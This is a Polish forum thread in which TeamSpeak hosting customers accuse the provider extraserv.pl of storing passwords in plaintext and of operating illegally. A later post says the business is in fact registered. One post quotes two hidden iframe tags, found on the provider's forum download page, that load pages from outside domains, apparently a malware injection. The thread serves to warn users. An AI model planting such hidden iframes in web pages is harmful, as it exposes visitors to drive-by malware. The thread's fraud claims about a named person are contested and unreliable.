Skocz do zawartości
Zaloguj się, aby obserwować  
fajkowy

[problem] extraserv.pl teamspeak.pl

Polecane posty

Wraz z kilkoma kolegami korzystam od kilku miesięcy z usług płatnego serwera Team Speak. Usługa jest stosunkowo tania, a jej płynność oceniam na 4+. Płacę rocznie za 35 slotów ok. 300zł. Koledzy wykupili podobne pakiety. Czasami zdarzają się drobne awarie, ale zazwyczaj następnego dnia wszystko wraca do normy. Największym problemem technicznym są „znikające banery”.

 

Jeden z kolegów który korzysta najdłużej - płaci już od blisko 3 lat. Jakiś czas temu odkrył że hasła do konta klienta są przechowywane gołym tekstem. Zapytał więc obsługę hostingu co mają na ten temat do powiedzenia. Po burzliwej dyskusji wyjaśnienia okazały się nieco sprzeczne, a temat został przez administratora zamknięty.

 

Sprawa wydawała się nieco dziwna, więc postanowiliśmy bliżej przyjrzeć się tej ofercie. Na pierwszy plan przyszedł regulamin, którego szczerze nikt z nas do tej pory nie czytał. Regulamin nie opisuje tego typu zagadnień, ale dało się zauważyć że zawiera mnóstwo błędów ortograficznych. Więc idąc tym tropem dalej postanowiliśmy dowiedzieć się czegoś więcej o tej „firmie”...

 

Następnego dnia sprawdziliśmy NIP i REGON. Okazało się że REGON należy do firmy która nic nie wie na temat takich usług. Natomiast NIP jest według urzędu skarbowego niepoprawny. Dopiero w tym momencie zorientowaliśmy się że żaden z nas jeszcze nigdy nie otrzymał żadnej faktury lub rachunku na te usługi.

 

Nikt nigdy nie myślał nawet że to „krzak”! To jest popularny usługodawca i ma wielu klientów. Można zaryzykować stwierdzenie że jest „liderem” na rynku Team Speak! Wszystko pięknie, a okazuje się że to najzwyklejszy „krzak”.

 

Zaprzyjaźniony człowiek z urzędu kontroli skarbowej wszystko posprawdzał. W ciągu godziny zdołał potwierdzić że wszystko to jest nielegalne. Powiedział nam że szczegółów nie może podać, ale dał nam do zrozumienia że usługa może „szybko przestać działać”.

 

Na deser jest coś jeszcze. Dowiedzieliśmy się że bazy danych własnych serwerów Team Speak nie będziemy mogli odzyskać. Krzak nie udostępnia możliwości przeniesienia własnej bazy danych do innego usługodawcy.

 

Morał z tego taki że krzak lada dzień polegnie, a my będziemy mieli problem z przenosinami do innej firmy – miejmy nadzieję że tym razem prawdziwej.

 

PS...

Adres przy rachunku bankowym tego krzaka to adres... cukierni! Podobno cukierania ta prowadzona jest przez matkę „krzaka”, która do wczoraj nic o tym nie wiedziała. Dobry zonk?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Życie :D

 

Nie macie dostępu do FTP, no nie? Bo jakbyście mieli to wgrajcie phpmyadmin i samo ściągnijcie BD :]

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Mamy tylko dostęp do czegoś co się nazywa "Extrapanel v3.04.03B". Nie da sie w tym importować/eksportować żadnych danych.

 

Dla mnie to nie jest duży problem bo mój serwer jest typowo gildiowy. Wystarczy podać na gildiowym forum nowy adres IP i zarejestrować 50 osób. Większy problem ma kolega który prowadzi u nich serwer publiczny – on ma kilkaset zarejestrowanych użytkowników.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Zgadza się, powinieneś podać nazwę krzaka aby ustrzec innych przed nimi.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Chodzi o www.extraserv.pl aka www.teamspeak.pl

 

Identyfikuje się danymi:

 

Michał Grzeszczak - extraserv.pl

Obodrzyców 15

81-812 Sopot

NIP: 585-14-01-233

REGON: 193015411

 

Podobno dawniej były podane inne dane:

 

Extraserv.pl

Jana Z Kolna 57

81-859 Sopot

(Prawdopodobnie z numerem REGON 192748063)

 

(Tak twierdzi kolega który korzysta z usług tego serwisu dłużej)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Wyniki:

 

Numer NIP 585-14-01-233 jest poprawny.

Numer REGON 193015411 jest poprawny.

 

Może już się "wykrzaczyli" i działają teraz legalnie? :D

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Jestem kolegą fajkarza. Opiekuje się jedną usługą w wymienionej „firmie”. Usługa działa najprawdopodobniej od dwóch/trzech lat. Otrzymałem ją rok temu od innej osoby (Właściwie zupełnie mi obcej). Zgłosiłem do Extraserv.pl prośbę o cesję i zmianę adresu e-mail. Płatnikiem pozostała jednak ta sama osoba - nie zwracałem więc uwagi na brak faktur i rachunków – myślałem że otrzymuje je płatnik...

 

Dzisiaj zadzwonił do płatnika ktoś z wydziału do spraw przestępczości gospodarczej i zapytał czy może zgłosić się do najbliższego komisariatu. Nie znam żadnych dodatkowych szczegółów. Postaram się dopisać do tematu przebieg kolejnych wydarzeń - gdy się czegoś więcej dowiem.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Fajka, widziałem.

 

Jako że sam jestem administratorem kilku for, a kolega fajkowy korzysta z mojego łącza, pragnę niniejszym prędko zgłosić że może wyglądać to jak multikonto ;-)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

ciekawe co majkel na to wszytko powie :D

Tak sie skladaka ze wlasciciel ma tutaj na forum konto ...

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Pojawiły się nowe informacje - zgodnie z zapowiedzią wszystko tutaj umieszczam.

 

Wspomniany kolega odwiedził komisariat przy ul. Malczewskiego w Warszawie. Dostarczył numery kont bankowych jakimi posługiwał się serwis Extraserv.pl w przeszłości. Załączył również potwierdzenia przelewów i obszerny opis sytuacji. Zarchiwizowano również numery NIP i REGON którymi identyfikował się ten serwis. Policjant stwierdził że jest to (Prawdopodobnie) tak zwane "firmanctwo" i obiecał wszystko przenieść na odpowiedni tor. Mamy więc UKS i Policje. Ciekawe co z tego wyniknie.

 

Ja dodam tylko pewną ciekawostkę. W międzyczasie, w dziale Kontakt na stronie Extraserv.pl, dodany został kolejny numer NIP (585-14-19-569), a wpis mówiący o tym że serwis jest częścią "Grupy PC-X" został usunięty. Tak więc chyba Pan Majkel przeczytał ten temat i działa w jego kierunku. Ale to chyba nic w tej sytuacji nie zmienia. Jest natomiast coś jeszcze. Bardzo miły prezent od Extraserv.pl specjalnie dla mnie ;-) Moja usługa nadal działa, serwer jest on-line, tymczasem zablokowano mi możliwość logowania się do panelu klienta. Gdy używam loginu i hasła do tej usługi - zostaje automatycznie przenoszony pod ten adres:

 

http://www.zumi.pl/1511162,Urzad_Kontroli_...zawa,firma.html

 

Trzeba przyznać że ktokolwiek za tym stoi ma bardzo ciekawe podejście do klienta. Nie jestem tylko pewien czy zamiarem autora tej zmiany było wywołać uśmiech ;-)

 

Wiem tylko że dzięki tej nowej opcji - sam również zamierzam odwiedzić obie wspomniane instytucje.

 

Najwyraźniej z zapytania o kodowanie haseł można czasami przejść szybko do wizyt w przytulnych gabinetach różnych instytucji, na które wszyscy się składamy. Kto by pomyślał?

 

Oczywiście będę informować na bieżąco o rozwoju wydarzeń.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

czy moglbys podac login i pass B)

 

chcilibysmy osobiscie sprawdzic ;)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
czy moglbys podac login i pass B)

 

chcilibysmy osobiscie sprawdzic ;)

 

Pod warunkiem że wyślesz mi swoje nazwisko i numer telefonu stacjonarnego. Wystarczy PM. Zadzwonie i podam. Im szybciej tym lepiej ;-)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK
Pod warunkiem że wyślesz mi swoje nazwisko i numer telefonu stacjonarnego. Wystarczy PM. Zadzwonie i podam. Im szybciej tym lepiej ;-)

 

Imie moja masz w profilu tutaj na forum, a dane wyslis mi na PW B)

Moje nazwisko oraz telefon jest Tobie do nieczego potrzebny ;)

 

pzdr

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Imie moja masz w profilu tutaj na forum, a dane wyslis mi na PW :)

Moje nazwisko oraz telefon jest Tobie do nieczego potrzebny :)

 

pzdr

 

Przykro mi, ale nie podam danych do żadnej usługi (Nawet takiej na której mi już nie zależy) komuś do kogo nie mam numeru telefonu. Mam nadzieję że to rozumiesz. W razie czego napisz PM z tym numerem i nazwiskiem.

 

Przed chwilą uzyskałem potwierdzenie tego "żartu" gdyby komuś było w to trudno uwierzyć:

 

czarodziejskieprzekiero.th.png

 

Nie jest dla mnie całkowicie jasne w jakich relacjach z Extraserv.pl aktualnie pozostaje mój korespondent. Dlatego pozwoliłem sobie ukryć jego nazwisko i adres e-mail. Nie chcę komuś przypadkowo zaszkodzić niepotrzebnym spam-em. Wyśle link do tego tematu i może sam się przedstawi :-)

 

Jest to osoba posiadająca uprawnienia administratora w Extraserv.pl i forum klientów Extraserv.pl/forum – jak również autor/włąściciel oprogramowania na którym uruchomiony jest ten serwis. Uprzedzając ewentualne pytania - pozostała część korespondencji dotyczy innej sprawy, oferty, firmy itd.

 

 

W okolicach południa dodam do tematu kolejną nowość ;-)

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
Gość RuFiK

net-speak - wlasciciel mariusz

extraserc, kiedys mariusz i majkel , a teraz zostal tylko majkel ?

Udostępnij ten post


Link to postu
Udostępnij na innych stronach
net-speak - wlasciciel mariusz

extraserc, kiedys mariusz i majkel , a teraz zostal tylko majkel ?

 

Przeczytaj mój komentarz pod obrazkiem i postaraj się go dokładnie zrozumieć. Ten temat jest jak średni film, ale nie róbmy z tego brazylijskiej telenoweli.

 

 

Obiecałem dodać ciekawostkę. No więc mój program antywirusowy zakomunikował mi że pod adresem http://extraserv.pl/forum/dload.php obowiązywać powinna kwarantanna. W nagłówku strony są jakieś podejrzane wpisy. Myślę że to forum będzie dobrym miejscem by zapytać co bardziej doświadczeni koledzy mają na ten temat do napisania. Dziura? Czy wszystko jest ok?

 

Są tam takie dwa wpisy:

 

<iframe src="<A href="http://klaomta.com/?click=242C41">http://klaomta.com/?click=242C41</A>" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>

<iframe src="<A href="http://namebuyfilmlife.cn:8080/ts/in.cgi?pepsi20">http://namebuyfilmlife.cn:8080/ts/in.cgi?pepsi20</A>" width=12 height=12 style="visibility: hidden"></iframe>

Co to jest?

 

 

Na wypadek gdyby link przestał działać – kopia od wielkiego brata:

http://209.85.229.132/search?q=cache:KMRZV...=clnk&gl=pl

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Rufik, tyle to mi program antywirusowy też zaserwował. Ale co to jest? To szkodzi serwisowi czy przeglądającym? Mam się martwić o swoją kolekcję zdjęć w slipkach, czy Extraserv.pl coś zgubił? ;-)

 

Aktualizacja:

 

Zamiast strony Zumi, widzę już znowu panel administracyjny. Zapowiada się ciekawie.

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Dokumenty są. Firma działa legalnie.

 

Dokumenty potwierdzają założenie firmy 06.07.2009 roku

Udostępnij ten post


Link to postu
Udostępnij na innych stronach

Bądź aktywny! Zaloguj się lub utwórz konto

Tylko zarejestrowani użytkownicy mogą komentować zawartość tej strony

Utwórz konto

Zarejestruj nowe konto, to proste!

Zarejestruj nowe konto

Zaloguj się

Posiadasz własne konto? Użyj go!

Zaloguj się

Zaloguj się, aby obserwować  

×